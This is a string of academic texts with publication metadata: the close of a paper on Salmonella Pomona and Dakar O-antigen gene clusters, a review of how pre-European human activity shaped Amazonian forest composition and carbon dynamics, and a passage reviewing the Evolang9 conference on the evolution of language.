The S. Pomona O antigen cluster could have been assembled using the wbuM, wbuN, and wbuO genes, at least, from E. coli O114 and other genes from a variety of different sources. E. coli O103 isolate H515b (GenBank accession numbers AY532664 and EF027106) has in its O antigen gene cluster homologs of the S. Pomona O28 rmlB, rmlA, fdtA (wbtA), fdtC (wbtB), and fdtB (wbtC) genes in the same order preceding wzx [29]. E. coli H515b strain, or a similar serogroup O103 E. coli, could also have been the source of the first five genes of the S. Pomona O28 O antigen gene cluster.
Information provided through sequencing of the S. Pomona and S. Dakar O-antigen gene clusters will allow probes for the various O28 wzx and wzy genes to be included in updated versions of DNA microarray-based Salmonella serotyping assays, as well as in assays comprising other formats [30]. This will make accurate serotyping more accessible for primary laboratories within the health care system. Differences in both the O antigen gene organization and content, as well as in the wzx and wzy gene sequences, suggest that the O antigen oligosaccharides of S. Dakar and S. Pomona may each have a different chemical structure but that both fortuitously contain the dominant O28 epitope. This needs confirmation in structural studies that are beyond the scope of the current investigations. Whether this situation occurs in any other serogroup is not known. It is clear that the development of molecular serotyping methods and the interpretation of results from these methods will require characterization of the relevant genes from each Salmonella serotype. Furthermore, the data presented here reinforce the observation that two isolates with the same serogroup may not, in fact, have the same gene content. Interpretation of the meaning of serovar identity and its relationship with virulence and host restriction or adaptation then becomes somewhat more problematic. For some purposes it may be of greater advantage to determine the genovar [11] of an isolate. | 2016-05-04T20:20:58.661Z | 2010-06-28T00:00:00.000 | {
"year": 2010,
"sha1": "f96f4a78ba1ddd6b0f5a2880a2c21fda58cce97b",
"oa_license": "CCBY",
"oa_url": "https://downloads.hindawi.com/journals/ijmicro/2010/209291.pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "ba25ca94fce9ab825f3a332389926894480cb341",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Biology",
"Medicine"
]
} |
221200992 | pes2o/s2orc | v3-fos-license | Ecological legacies of past human activities in Amazonian forests
Summary In Amazonia, human activities that occurred hundreds of years ago in the pre‐European era can leave long‐lasting effects on the forests – termed ecological legacies. These legacies include the intentional or nonintentional enrichment or depletion of certain species. The persistence of these legacies through time varies by species, and creates complex long‐term trajectories of post‐disturbance succession that affect ecosystem processes for hundreds of years. Most of our knowledge of Amazonian biodiversity and carbon storage comes from a series of several hundred forest plots, and we only know the disturbance history of four of them. More empirical data are needed to determine the degree to which past human activities and their ecological legacies affect our current understanding of Amazonian forest ecology.
I. Introduction
The importance of Amazonian rainforests for an array of ecosystem services and functions is well known amongst scientists but perhaps less so amongst policymakers (Levis et al., 2020). The biodiversity of Amazonian forests is immense (ter Steege et al., 2020), but the mechanisms driving the relative abundances and distributions of this diversity remain largely unresolved. Environmental gradients, biotic interactions and dispersal limitation all play a role in structuring diversity patterns in Amazonian forests (e.g. Wright, 2005). An emerging hypothesis is that past disturbances in the landscape, particularly those caused by human activities, have also played a role in shaping the structure, function and diversity patterns observed in modern forests McMichael et al., 2017b).
People have lived in Amazonia for over 10 000 yr (Roosevelt, 2013) and have cultivated maize in some regions for over 6000 yr (Brugger et al., 2016;. Besides cultivation, people in the pre-European era also used fire to clear forests and amend soils, and they domesticated several plant species (e.g. Neves & Petersen, 2006;Piperno, 2011;Clement et al., 2015). Some of these forests have been managed continually by indigenous people for hundreds or even thousands of years, sometimes termed intensive or opportunistic agroforestry (Neves, 2013;Levis et al., 2018). But many areas that were cleared and managed at the time of European arrival c. 500 years ago were abandoned, when a majority of indigenous populations collapsed (Denevan, 2014). Following European colonization, many Jesuit missions were established but were quickly abandoned (Reeve, 1993). The 'Amazonian rubber boom' (c. AD 1850-1920) was a subsequent influx of European colonists that later collapsed because establishing rubber plantations was cheaper in Malaysia (Hecht, 2013). It is likely that all of these past waves of colonization and abandonment in Ecological legacy refers to the influence of an event (i.e. disturbance) on an ecosystem and its persistence over a given time period, and is a term that has been widely used in succession studies. The type and intensity of human disturbance (e.g. clear cut versus forest burning) affect the trajectory of the ecological legacy in Amazonian systems on decadal timescales (e.g. Mesquita et al., 2015). The long-term ecological legacies of past human impacts during the pre-and post-European eras, however, remain more obscure. Here I review recent advances in our understanding of long-term ecological legacies in Amazonia with a focus on biodiversity and carbon storage, and highlight why assessing past disturbances is crucial for understanding the patterns and dynamics observed in these globally important forests.
II. Ecological legacies on forest composition
Most studies of ecological legacies on Amazonian forest composition have focused on the enrichment and long-term persistence of useful species. It has been suggested that Bertholettia excelsa (Brazil Nut), Bactris gasipaes (Peach Palm) and other edible plants were enriched in the pre-European era, and their abundances have remained artificially high ever since (i.e. for hundreds of years) ( Fig. 1a; Scoles & Gribel, 2011;Clement et al., 2015;Thomas et al., 2015;Maezumi et al., 2018). In a series of c. 1100 forest plots in Amazonia, there were higher richnesses and abundances of domesticated tree species in locations that were closest to known pre-European archaeological sites . Many of these same domesticated species that show a relationship with pre-European occupation are also some of the most abundant across the basin (ter Steege et al., 2013).
Ecological legacies following disturbances may not always be persistent, as is the case with early successional taxa, such as Cecropia or Trema (Fig. 1a). Mid-to late-successional taxa, such as Ficus and Pilea, have longer life spans and can persist for centuries, but eventually decrease in abundance ( Akesson et al., 2020). In Costa Rican forests, the proportion of old-growth taxa can reach 30-40% within 25-30 ys following a disturbance, but then only reaches 50% at 80 yr following a disturbance (Chazdon et al., 2009). The systems are expected to continue shifting in their composition for at least 200 yr following a disturbance (Foster, 1990;Loughlin et al., 2018). These nonpersistent ecological legacies are often simply part of the long-term successional process.
Ecological legacies in Amazonia can also include the depletion of species by people (Fig. 1b). The most commonly observed example of species depletion in palaeoecological records is the palm Iriartea deltoidea, which occurs in higher abundances where there is little to no evidence of human activity compared with areas containing past fire and cultivation Heijink et al., 2020). Iriartea deltoidea usually recovers c. 100 yr after site abandonment and often reaches abundances higher than before the disturbance (Fig. 1b). Iriartea deltoidea is currently the sixth most common tree species in Amazonia (ter Steege et al., 2020), and it is possible that this rise to dominance occurred as result of recovery from past depletions. It is hard to find examples of persistent depletion, which would require a species to have poor recruitment and limited seed dispersal. These types of species are rare in the landscape (Wills et al., 1997), and therefore almost undetectable using palaeoecological reconstructions.
Palms are disproportionately abundant in Amazonia compared with other tree families, and have varying degrees of responses to human disturbances. Wettinia is a genus of mid-successional palms that has a similar, nonpersistent, negative response to human disturbance like I. deltoidea. Wettinia, however, does not seem to have the recovery overshoot that has been documented in Iriartea Relative abundance (SD) Relative abundance (SD) . Both of these Euterpe species are useful for their fruit, but their abundances do not seem to shift drastically in response to low levels of human disturbance ( Fig. 1; Heijink et al., 2020).
III. Ecological legacies on biomass and carbon dynamics
Amazonia provides a significant input to global carbon and climate models, and is believed to sequester more carbon than it releases (i.e. is a carbon sink; e.g. Aragao et al., 2014). Global climate and carbon models assume that forests are not recovering from past disturbances, although this is intensely debated (Wright, 2013). Over recent decades, the carbon sequestration potential of Amazonia has been declining because increases in tree productivity rates have slowed and mortality rates have increased (Brienen et al., 2015). The effects of short-term disturbances (e.g. El Niño events) have been studied (Phillips et al., 2009), but very little is known about the longer-term disturbance histories within the forest plots that are used to estimate Amazonian carbon dynamics. Old growth forests typically contain high amounts of biomass, but have relatively low productivity and mortality rates (Fig. 2a). Landscape modifications by people lower the biomass but increase the productivity and mortality of the system until the disturbance ceases (Fig. 2b). Of these modifications, fire and deforestation are the most intense, and biomass recovery patterns are known to be linked to disturbance intensity (de Avila et al., 2018). Early successional species transition to mid-successional species, which have a higher biomass, c. 60 yr after abandonment, and this process can happen for over 100 yr ( Fig. 2c; Loughlin et al., 2018). Biomass recovery, however, has been shown to exceed 100% of the predisturbance values until at least 100 yr following an event ( Fig. 2d; Poorter et al., 2016). There are no current estimates of how long it takes for the long-lived, mid-successional species to die off and for biomass to return to pre-disturbance values (Fig. 2e). There are also no data yet as to how long-term succession may be affecting the forest dynamics observed in recent decades.
It is possible that the decline of the Amazonian carbon sink and slowing down of productivity observed in the last 30 yr (Brienen et al., 2015) reflect biomass and carbon dynamics returning to predisturbance values over the last several hundred years (Fig. 2d,e). Biomass and carbon dynamics are directly linked with species composition (e.g. Phillips et al., 2019), and thus ecological legacies of species composition (Fig. 1) probably translate to legacies on biomass and carbon dynamics (Fig. 2). High abundances of Bertholettia excelsa in southwestern Amazonia, which may be related to past human enrichment (Fig. 1a), play a large role in the overall carbon storage potential of those forests (Selaya et al., 2017). The large changes in palm abundances seen over the last several thousand years have also probably affected biomass and carbon dynamics. The forest plots used to measure carbon dynamics in Amazonia are disproportionately located in areas containing high densities of archaeological sites and high probabilities of pre-European settlement (McMichael et al., 2017b). These plots are thus probably capturing changes in carbon dynamics related to long-term successional dynamics and ecological legacies.
IV. Outlook: advancing our knowledge of long-term ecological legacies
There are several knowledge gaps and debatable aspects regarding ecological legacies in Amazonian forests. The first concerns the timing and intensity of the disturbance that created the ecological legacy. Most research has focused on linking pre-European human activities with modern vegetation, but the impacts of the last 400 yr of postcolonial activities are also beginning to be considered (McMichael et al., 2017a;Arienzo et al., 2019). These two eras had different types and intensities of land use, which affect long-term successional trajectories (Bodin et al., 2020). Past human disturbances include fire, forest clearance, cultivation, and tree domestication (increased palms and fruit trees). Canopy openings result in a thicker understorey, increased numbers of grasses (green forest floor) and pioneer taxa. (c) Early successional forests retain high numbers of domesticated species, palms and pioneers, and begin accumulating large trees. (d) Mid-successional forests retain high abundances of domesticates, long-lived pioneers and large trees, resulting in higher biomass than mature forests (red bar, above-ground biomass (AGB)). (e) Pioneers die off and mature forests re-emerge, although they are compositionally different than before the disturbance. Darker shading indicates higher values and lighter shading indicates lower values for changes in AGB, productivity (Prod), and mortality (Mort) through time following a large-scale disturbance.
New Phytologist (2021) 229: 2492-2496 Ó 2020 The Author New Phytologist Ó 2020 New Phytologist Trust www.newphytologist.com The time since the last major disturbance is almost unknown in the forest plots used to study biodiversity and carbon dynamics. The time since the last fire has been published in only four out of the hundreds of surveyed forest plots ( Fig. 3; Heijink et al., 2020). Los Amigos in Peru has burned in some areas as recently as 50 yr ago (Figs 2, 3, yellow star), whereas Amacayacu in Colombia has not burned in over 1600 yr (Figs 2, 3, white star). The other two forest plots had burned between 300 and 600 yr ago, and it is unknown whether biomass and composition have returned to pre-disturbance values (Figs 2, 3, pink and red stars). Interestingly, palm abundances in the modern vegetation and in vegetation reconstructions were significantly lower at Los Amigos, which has had more recent and frequent fire events over the last 4000 yr compared with the other plots (Heijink et al., 2020). The timing of the last major disturbance for the majority of these forest plots remains unknown (Fig. 3).
The spatial extent of these past human activities and ecological legacies into less well-studied and less accessible regions of the forest also remains unknown and is highly debated. Some have argued that the extent of site abandonment and subsequent forest regrowth after European arrival was so great that it caused a global decrease in CO 2 concentrations (Koch et al., 2019). But these assumptions rely on archaeological datasets, which, like the forest plots, are biased towards the accessible areas in Amazonia (McMichael et al., 2017a). Many soil surveys conducted in randomized and less accessible areas show little to no evidence of past fire or human occupation, or even the slightest bit of past forest opening (Piperno et al., 2019). Despite extensive scanning of hundreds of samples for charcoal in soils collected from a forest plot in the Colombian Amazon, only three were collected that were > 10 mg, or the minimum size required for 14 C dating (Heijink et al., 2020). There was no evidence of maize or past forest openings in the 90 phytolith samples analysed from this forest plot, and the most recent fire occurred 1600 yr ago (Figs 2, 3;Heijink et al., 2020). The probability of the modern vegetation reflecting past human activities, or an ecological legacy, at this site is almost zero.
The integration of ecological, palaeoecological, and archaeological data are crucial to understanding the long-term ecology and ecological legacies in Amazonian forests. Archaeologists and palaeoecologists are beginning to collect complementary datasets (Mayle & Iriarte, 2014;Maezumi et al., 2018;Akesson et al., 2019). But to fully understand how past human activities affect modern processes, the palaeoecological and archaeological data must also be collected within the series of ecological surveysthe Amazonian forest plots that are used for estimating biodiversity and carbon dynamics. The four plots with past fire and vegetation data tell radically different stories, and filling in the gaps on the continuum of past disturbances is necessary to make links with the patterns found in the modern observational data (Figs 1-3).
Advancements in techniques of looking into the past are pushing the boundaries of what can be learned from ecological, palaeoecological and archaeological datasets. One example is by extracting dendrochronological, isotopic and genetic information from living trees, and using that information as time capsules of past human and climatic change (Caetano-Andrade et al., 2020). Another example is by using the chemical and morphological composition of charcoal found within palaeoecological and archaeological archives to infer the temperature (intensity) of past fires and the types of plant material that were burned (Goulart et al., 2017;Gosling et al., 2019). These technical developments, as well as those geared towards improving the taxonomic identification of macroand microfossils, are providing deeper insights into how past disturbances are manifested in modern systems. Map showing the distribution of Amazonian forest plots that are used to observe biodiversity (blue circles) and carbon dynamics (brown circles). Stars represent forest plots where there is information on the time since the last fire (see Fig. 2). | 2020-08-21T13:01:52.300Z | 2020-08-19T00:00:00.000 | {
"year": 2020,
"sha1": "3cada387a0ef83b3168c0dff0f4ccd18753544dc",
"oa_license": "CCBY",
"oa_url": "https://nph.onlinelibrary.wiley.com/doi/pdfdirect/10.1111/nph.16888",
"oa_status": "HYBRID",
"pdf_src": "PubMedCentral",
"pdf_hash": "5d2fdf9c139c92c6e4984c3d1e48875fcf122ac6",
"s2fieldsofstudy": [
"Environmental Science"
],
"extfieldsofstudy": [
"Medicine",
"Geography"
]
} |
61012027 | pes2o/s2orc | v3-fos-license | Review of the 9 th International Conference on the Evolution of Language (Evolang9)
The 1990’s have witnessed a resurrection of an interest in the origins of language (in fact, such an interest had never actually faded). Although pin-pointing the exact triggers behind the initial sparkles is difficult, one may advocate for the integration of a number of scientific advances, including the first computer simulations of the self-organized emergence and convergence of linguistic conventions (Hurford 1989, Steel 1996), the significant progress in the systematic analysis of mtDNA or Y chromosome genetic distributions across the world (Cann et al. 1987, Underhill et al. 2000), the synthesis of the data from genetics, archaeology, and linguistics (Cavalli-Sforza et al. 1988, 1992), and many others. In 1996, the first Conference on the Evolution of Language (Evolang) was held in Edinburgh for the purpose of fostering a dialog between scholars of diverse backgrounds. At the center of discussions — and in opposition to a generativist framework minimizing the value of such an attempt (Chomsky 1972, Berwick 1998) — laid an effort to account for the properties of the faculty of language in light of modern evolutionary theory (Hurford et al. 1998). The 9th Evolang conference (Evolang9), which took place in Kyoto 13–16 March 2012, was once again an opportunity for scholars from a wide range of disciplines to gather and bridge their lines of arguments (McCrohon et al. 2012, Scott-Phillips et al. 2012). Since the origins and evolution of language have long been the research foci in both evolutionary linguistics and biolinguistics, we provide here a review of the variety of reports that was brought forward during Evolang9. Without being able to pay justice to the wide scope of all contributions that were made, we mainly summarize and frame the primary arguments that echoed during the conference, highlight significant evolutions of the field both in terms of methods and content, and present our opinions on future research in this line.
approaches and fields.Without being exhaustive, contributions usually cover linguistics (sociolinguistics, language acquisition, physiology of speech, syntax, etc.), logic, game theory, mathematical modeling and computer simulations, genetics, ethology, human and comparative psychology, neuroscience, paleoanthropology, archaeology, philosophy, evolutionary psychology, and developmental biology.Trends however channel the relative weights of these fields from one conference to another.We give below five long-term tendencies we deem of special significance.
The first trend is the decrease in modeling approaches which has taken place between the mid-2000's and recent years.Models and simulations (most often self-organizing multi-agents models), for example, made the bulk of the contributions to Evolang5 and Evolang6 respectively held in Leipzig and Roma (Cangelosi et al. 2006).The investigations then revolved around (i) the emergence of compositional structures, and most often how a stable order for subjects, verbs and objects could be achieved without central coordination (e.g., Kirby 2000, Smith et al. 2003a, Gong et al. 2005, 2009), (ii) the impact of embodiment in robots, with noticed endeavors of Luc Steels' teams in Paris and Brussels in building on more sophisticated linguistic theories, such as the fluid construction grammar (e.g., Steels et al. 2005, Steels & de Beule 2006, Steels 2011, van Trijp et al. 2012), (iii) the impact of socially structured populations (with popular structures, such as scale-free or small-world networks) on the self-organization of linguistic systems or the diffusion of innovations (e.g., Dall'Asta et al. 2006, Barrat et al. 2007, Gong et al. 2008, Ke et al. 2008), and (iv) the impact of repeated episodes of learning on the design of linguistic structures (e.g., Kirby 2007, Kirby & Hurford 2002, Smith et al. 2003b, Steels 2012).Regarding the last effort, Simon Kirby's Language Evolution and Computation team and their Iterated Learning Model (ILM) were particularly instrumental in partly shifting models from horizontal linguistic transmission (among a usually 'immortal' population of agents) to vertical transmission (with generations of successively learning and teaching agents shaping a communication system).
Although modeling and robotic approaches were reported during the Kyoto conference (e.g., Gong & Shuai 2012, Smith 2012, Spranger & Steels 2012) -noticeably by plenary speaker Minoru Asada, who emphasized the potential of cognitive development robotics to study language acquisition and more generally simulate child development -, several attendees observed a decline with respect to their former prominence.During a preliminary satellite workshop of the conference, Bart de Boer addressed this issue by stressing three common pitfalls of modeling: (i) fact-free science not referring to outside phenomena, (ii) cargo-cult science, an activity mimicking the procedures of science without delivering results (according to Feynman 1974), and (iii) circularity when a model only explains the data that were used to build it.To avoid these traps and keep modeling successful, de Boer advocated for various strategies.Better validating the models was one of them -with mathematical proofs, sensitivity studies, and model parallelism for internal validation and the prediction of real and noncircular data for external validation.Another direction worth taking was better complementing and re-using existing models, rather than always starting again from scratch -a tendency shared by many modelers.Finally, focusing on ques-tions raised by non-modelers and attempting at bridging empirical gaps were deemed precious to increase the reliability of modeling (de Boer 2012).
A second trend is the more central position of experimental approaches in the study of language evolution.As noted by Normile (2012), this experimental stance covers a number of fields, from analyzing the online brain activity of stone tool-makers (Stout et al. 2008, Stout & Chaminade 2012) to studying how subjects learn an alien language composed of whistles (Verhoef et al. 2012).However, one of the most meaningful shifts lies, to us, in the displacement of the iterated learning model from 'silicon-made' subjects to human ones.This step was pioneered among others by Galantucci, with experiments of human subjects learning an artificial language to cooperate in front of a simple task (Galantucci 2005).Interestingly, several talks illustrated how the ILM, which started as a theoretical and modeling framework, had found its way to the experiment room (e.g., Scott-Phillips et al. 2010, Kirby 2012, Verhoef et al. 2012), perhaps reflecting, in a somehow radical way, de Boer's thinking on models and simulations.
A third evolution of the field relates to the broadening of the spectrum of comparative approaches between human language and animals' communicative systems.For obvious reasons, apes and monkeys have been the center of interest, with many experiments consisting in teaching a human or human-like form of communication (e.g., Patterson 1981, Savage-Rumbaugh 2001) to non-human apes or focusing on their comprehension of others' intentions (e.g., Call & Tomasello 1998, 2008;Heyes 1998;Schmelz et al. 2011).Other animal models have however gradually made their way and enjoyed high popularity at the Kyoto venue.Rather distant from humans on the phylogeny of species, birds became center of discussion (Fujita 2012, Katahira et al. 2012, Matsunaga et al. 2012, Okanoya et al. 2012, Sasahara et al. 2012, Stobbe & Fitch 2012), with special attention paid on the one side to parrots and keas for their remarkable cognitive abilities (Pepperberg 2010(Pepperberg , 2012)), and on the other side to a couple of species relevant for their close genetic relationship yet divergent environment (see below): white-rumped munias and Bengalese finches (Takahasi et al. 2012).Meanwhile, monkeys and apes were still present, and at a methodological level, keynote speaker Tetsuro Matsuzawa stressed the combination of field experiment -building specific device in the wild to study wild populations of apes manipulating tools (Biro et al. 2003) -with participant observation relying primarily on the bound between the ape mother and her child (Matsuzawa et al. 2006).All in all, the conference highlighted the strong expertise of various Japanese research centers in animal studies.
A fourth methodological trend was a latent reflection on the scientific paradigms relied on to study the evolution of language.In addition to de Boer's suggestions on successful modeling, Roberts & Winters addressed the development of nomothetic approaches in contrast with idiographic ones.While the latter deal with singular cases, the former draw on large sets of data -spanning over large linguistic, cultural, physical, and other domains -and seek law-like patterns behind 'surface' correlations (Roberts & Winters 2012).Nomothetic approaches have been the subject of recent publicized studies and hot debates among scholars working on the origins and current diversity of modern languages (e.g., Lupyan & Dale 2010, Atkinson 2011, Bybee 2011, Dunn et al. 2011).Since the Evolang conferences rather focus on the emergence and development of the faculty of language, contributions relying on this methodology remained limited.However, as large datasets in various fields have ever been more and more available and manipulable, there are reasons to believe that such contributions could become influential in future venues.Nonetheless, Roberts & Winters warned against the pitfalls of this line of work, where poor quality of data (e.g., in terms of sampling), spurious correlations and lack of alternative hypotheses may all lead to wrong conclusions (for further details, see www.replicatedtypo.com).Statistical problems linked to the non-independence of the statistical units of a study -whether due to the historical relatedness of languages or their spatial distribution with possible geographic diffusionsprove to be especially difficult (Jaeger et al. 2011), as also noted by Russell Gray during his keynote lecture regarding his work on linguistic Bayesian phylogenies (Gray et al. 2009).Integrating different approaches -nomothetic, idiographic, constructive -is seen as the best way forward to compensate the weak explanatory power of the first approach -correlation does not imply causation -, the limited range of the second and the potential circularity of the last.
The final point we want to make regards brain imagery techniques applied to activities related to communication and language evolution.EEG (encephalography) or fMRI (functional magnetic resonance imaging) are of course ubiquitous in today's neuroscience, but original studies are gradually appearing which focus on the evolution of language.Takashi Hashimoto thus mentioned studies where simultaneous EEG recording took place in two subjects playing a coordination game (Hashimoto 2012), allowing to observe the neural activity at various stages of the formation of a symbolic communication system.Russell Gray also referred to Stouts and collaborators' experiments where the brain activities of the tool-makers were recorded through PET (positron emission tomography) during sessions of tool-making.This allows detecting significant changes in activated areas for different prehistoric lithic industries (e.g., Oldowan and Acheulean), and possible overlap with language circuits (Stout et al. 2008, Stout & Chaminade 2012).Finally, whole-brain fMRI recordings in Zebra finches of neuronal correlates of song learning were presented, showing evolving activations during the course of the sensitive period in primary and secondary auditory areas (van der Kant & van der Linden 2012, Moorman et al. 2012).
Given these methodological remarks, we can now turn to the contents of the contributions reported at Evolang9, trying to frame various lines of evidence and disciplines.
Designing Language Structures: Disentangling Biology, Culture, Cognition and Learning
During Evolang9, Hajime Yamauchi usefully reframed the famous ban against publications on the origins of language by the Société Linguistique de Paris in its cultural and political context (Yamauchi et al. 2012).As in the 1860's, the evolution of the contributions to the Evolang series reflects the dominant forces and structures of the scientific domain.David Premack's famous quote, "Human language is an embarrassment for evolutionary theory" (Premack 1985: 281-282), has been used as a subtitle for some of the past Evolang conferences.Generally speaking, these meetings have attempted at providing an answer by disentangling the influences of various frames to which language may belong, including (i) biology (with the genetic substrate of language), (ii) culture (with language existing in a socially constructed community of interacting speakers), (iii) cognition (with language building on and coexisting in the human mind with other cognitive abilities), and (iv) learning (with language being repeatedly learnt and transmitted between generations of speakers).Such frames are only partially separable from each other, and one may advocate for natural selection as the primary force that drove language evolution, stating that all further effects may ultimately be traced back to genes and their evolution.
Several periods of discussions during Evolang9 actually focused on the role played by natural selection in the emergence of language, with clear evidence that more than twenty years after Pinker & Bloom's (1990) seminal paper on the question, some scholars still opposed to its primacy.Keynote speaker Massimo Piattelli-Palmarini particularly challenged the standard evolutionary perspective, defending instead an evo-devo (evolutionary developmental biology) perspective with minor gene rearrangements and shifts in gene regulation leading to major morphological changes, hence understating the driving role of function for such changes as long as survival and reproduction are preserved.The specific analogy with the eye of the rhopalia jellyfish (Gerhart & Kirschner 1997, Coates 2003) was cited as a complex structure without function by Piattelli-Palmarini, although the question was raised by the discussants of how it could have spread to the entire population without functional advantage -see also Mackie (1999) for further arguments about the functionality of the cubozoan ocelli or 'eyes'.
Irrespective of the actual weight of standard selection, several contributions reminded of the complexity of the phenomena at hand.Yasuhiro Suzuki and colleagues introduced the intricacies of the evolution of herbivore-induced plant volatiles, and how interwoven evolutions of species led to complex dynamics with possible increase or decrease in biodiversity (Shiojiri et al. 2010, Suzuki et al. 2012).Keynote speaker Simon Fisher furthermore detailed the complexity behind the role of the FOXP2 gene, arguing against the reductionist view of the 'gene for oral language' and stressing the complex set of genetic interactions in which FOXP2 fulfills its functions (Fisher & Scharff 2009, Fisher 2012).Fisher also highlighted some recent advances in neurogenetics, and how this discipline might help in future to decipher the convoluted relationship between the cognitive function of language and its genetic basis.
The subtlety of natural selection beyond the key ideas of genetic variability and selection was particularly addressed during Evolang9 through the notions of masking and unmasking of selective pressure in relation to the process of niche construction.Interestingly, these phenomena were referred to by scientists from various fields, covering modeling and animal studies.
During his concluding lecture, Terrence Deacon gave a clear example outside the linguistic sphere: While many animals synthesize ascorbic acid (vitamin C), anthropoid primates lack this capacity and only possess a non-functional version of the crucial gene involved in the chemical mechanism.According to Deacon, the primates' fruit diet, rich in vitamin C, explains this evolution: Because this vitamin was readily available 'exogenously' for these animals, the selective pressure on the gene involved in endogenous synthesis relaxed -it was masked -until it lost its function.This in turn bounded primates to their diet, playing a role in the construction of their specific ecological niche.Functions related to living in this niche -especially being efficient in acquiring food rich in vitamin C -hence became under stronger selective pressure.In other words, the selective pressure on such functions was unmasked in the process (Deacon 2003, Wiles et al. 2005).Deacon insisted that the whole process was cyclical, with adaptations for niche-maintaining leading to novel functional synergies.He also applied this evolutionary pattern to language, stating that the construction of a symbolic linguistic niche resulted in unmasking specific selective pressures on the human brain while at the same time masking previous ones, hence allowing brain structures to evolve in functionality (Deacon 2012).
Other speakers presented test cases for this framework.The evolution of Bengalese finches (BFs) in Japan with respect to white-rumped munias (WRMs) was especially enlightening.WRMs are wild birds found in tropical Asia and in some parts of Japan; a strain was isolated 250 years ago and domesticated, resulting in today's BFs.Studies devoted to the features of the vocal cultures of both strains, with two colonies recorded over several generations in sound-proof boxes, showed that WRMs kept the colony founders' song through generation while BFs displayed rapid divergence (Takahasi & Okanoya 2010, Takahasi et al. 2012).These observations could be explained by a stronger innate bias in WRMs toward specific songs, which in turn is related to the previous notions of masking and relaxed selective pressure: WRMs in the wild are under strong selective pressures to produce songs that will attract conspecifics, while this pressure was relaxed/masked in the domesticated strain.In such studies, evaluating the similarities between birdsongs, or their overall complexity and diversity, can be done with simple or more refined techniques.Katahira et al. (2012) relied on hidden Markov models to study the high-order context dependencies in Bengalese finch songs, showing that a first-order model was enough to predict the songs.We can also report here on Sasahara et al.'s (2012) approach, which consisted in applying network construction and analysis techniques to the transitions observed between different phrases along song sequences of the species California Thrasher.It appeared that the structural properties of the bird's 'syntax' allowed both familiarity at the local level of the song sequences and novelty at the global level; both aspects were judged useful by the authors, with the first one to establish a singer's identity and the second one to let birds develop virtuosity in their singing.
Another test case came from the modeling efforts attempting at assessing the weights of biology, culture, and learning in the emergence of linguistic structures.A Bayesian iterated learning model of cultural transmission coupled with a mechanism of biological evolution showed that weak genetic biases could be quickly unmasked and stabilized by cultural transmission in a population of speakers, yet never turn into strong biases because of a masking by iterated learning (Kirby et al. 2007, Thompson et al. 2012).These simulations stand against the postulate that linguistic universals are due to strong innate biases -a 'uni-versal grammar' (UG) (Chomsky 1965).Instead, they suggest that such universals can rather be explained by weak biases and a coordination of biology and culture regardless of their different evolutionary rates.
Another key concept that was repetitively addressed during Evolang9 was the double articulation of language, with meaningful units (morphemes) built from meaningless units (phonemes) and then articulated in larger structures (sentences and discourses).In his keynote talk, Simon Kirby denoted the first articulation of the duality of patterning, combinatoriality, and the second, compositionality.
The emergence of compositionality was investigated by Kirby and colleagues with a lab experiment involving learning an artificial language -strings of syllables paired with structured graphic meanings.Subjects could get tested on their learning, with their answers then used to teach naive learners, much in the fashion of iterated learning in computer models (e.g., Kirby et al. 2008).Different conditions led to different results.Isolated subjects learning a system and transmitting it to the next generation -i.e.vertical transmission but no horizontal transmission -, with an additional and external mechanism to avoid ambiguity, led to the emergence of a compositional communication system.While not preventing ambiguity restricted compositionality to develop, replacing ambiguity avoidance by horizontal transmission -having two subjects for each generation, communicating with one another on the various meanings -restored the previous result.Finally, when vertical transmission was removed and only horizontal transmission took place, compositionality was only limited.These various results showed that a combination of both naïve learners and communication was needed to achieve compositionality.In addition, a fourth study, where structures were learned and exchanged without corresponding meanings, further showed that semantics was not needed for the emergence of repeated subsequences in the strings of syllables.
In order to address the emergence of combinatoriality, getting away from existing languages was needed.Tessa Verhoef and colleagues have addressed this issue by relying on slide whistles used by subjects to produce sounds, the properties of which could be analyzed in terms of combinations, repetitions, etc.Their results suggested that phonemic coding not rely on pressure from large number of signals -an argument behind the hypothesis that an initial holistic proto-language could have evolved as the number of exchanged meanings increased with time.Rather, starting from random sequences of whistles, iterated learning gradually led to whistled elements being reused according to combinatorial constraints (Verhoef et al. 2011(Verhoef et al. , 2012)).
Combinatoriality, as described by Kirby, was also addressed in a contribution regarding the alarm calls of Campbell's monkeys (Barceló-Coblijn & Gomila 2012).Contrary to popular vervet monkeys' holistic alarm calls (Seyfarth et al. 1980), Campbell's monkeys' six calls displayed an internal structure, with the adding of a final -oo resulting in a different meaning ('krak' relates to leopards, while 'krakoo' can be used for almost any disturbance) (Ouattara et al. 2009).What looks a priori here as affixation points to the morphology found in human language.However, Barceló-Coblijn & Gomila insisted that the components of the alarm calls not share all the features of human morphemes.On the one hand, the final -oo does not possess a meaning of its own and the call resulting from the concatenation of, say 'krak' and 'oo', does not have a meaning transparently related to the meanings of its parts.On the other hand, the authors stressed that morphemes are more than minimal units of meanings, and are at the crossing of two processes.The first process is lexicalization, by which concepts are turned into lexical units respecting the 'edge features' of morphemes.These features describe the semantic and syntactic compositional properties of morphemes, and lead to a hierarchical structure of lower and higher meaningful units.The second process is externalization, by which lexical units get a phonological structure.Campbell's monkeys' alarm calls were then defined as pleremes -meaningful signals made of meaningless particles -, relating only to the second process of encoding and compressing information into an external signal.
Barceló-Coblijn & Gomila were not the only participants to remind the audience of the very specific nature of linguistic symbols.Piattelli-Palmarini also mentioned properties of words that made them more than other symbols: aspectual reference, headedness, internal structure, and the previously mentioned edge features.
In the context of Evolang9, the previous considerations on lexicalization and combinatorial properties could be connected more generally to the cognitive context of language evolution.James Hurford commented on Merge, which can be said to extend the previous notion of lexicalization and lie at the center of the Minimalist Program inside generative grammar (Chomsky 1993(Chomsky , 1995)).Whether this cognitive capacity came before or after externalization is at stake: Externalization enables communication with others, while merge may not only enhance it but also participate in the development of complex private thoughts.Which came first is hard to know, since, as demonstrated by Hurford, a double dissociation exists between having complex private thoughts and possessing a complex communication system.However, biolinguist Cedric Boeckx took side and advocated for communication not playing a role in the initial development of linguistic cognitive abilities (although it later became relevant with cultural transmission).The merging operation was listed along with the edge property and cyclic transfer, or phase, as the three minimally specified syntactic components needed for a plausible UG.Boeckx further introduced the notion of a global neuronal workspace (GNW) to provide a frame in which bridges could be built across previously disconnected cognitive modules; a language of thought, with lexicalization and then merging of concepts, allowed meanings of various natures to integrate (Boeckx 2012).This approach explicitly echoed Fodor's language of thought (Fodor 1975), but was also reminiscent of Fauconnier & Turner's (1998, 2002) scope blending, or Mithen's (1996) cognitive fluidity.The 